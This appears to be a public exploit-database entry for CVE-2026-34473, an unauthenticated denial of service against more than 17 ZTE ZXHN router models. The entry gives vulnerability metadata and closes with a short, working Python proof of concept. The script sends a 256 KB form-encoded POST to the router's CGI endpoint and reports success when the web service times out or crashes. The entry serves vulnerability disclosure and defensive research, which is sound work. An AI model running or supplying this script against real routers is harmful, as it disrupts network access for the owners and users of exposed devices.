Share
## https://sploitus.com/exploit?id=PACKETSTORM:221651
# Title: ZTE Routers (17+ Models) - Unauthenticated Denial of Service via
    Oversized POST Body
    # Date: 2026-05-20
    # Author: Mina Nageh Salalma (Monx Research)
    # CVE: CVE-2026-34473
    # Vendor: ZTE Corporation
    # Affected: 17+ ZTE ZXHN router models (~140,000 publicly exposed devices)
    # Category: Remote / DoS
    
    # Description:
    # CGILua post.lua parser does not enforce a maximum body size on
    # application/x-www-form-urlencoded POST requests. Sending an oversized
    # POST body to any CGI endpoint crashes or freezes the web service.
    # No authentication required.
    #
    # MITRE: https://www.cve.org/CVERecord?id=CVE-2026-34473
    # Write-up:
    https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
    
    # PoC:
    import requests
    url = "http://TARGET_IP/cgi-bin/luci"
    payload = "a=" + "A" * (256 * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"HTTP {r.status_code} - device still up")
    except requests.exceptions.Timeout:
        print("Timeout - web service unresponsive (DoS successful)")
    except requests.exceptions.ConnectionError:
        print("Connection dropped - web service crashed (DoS successful)")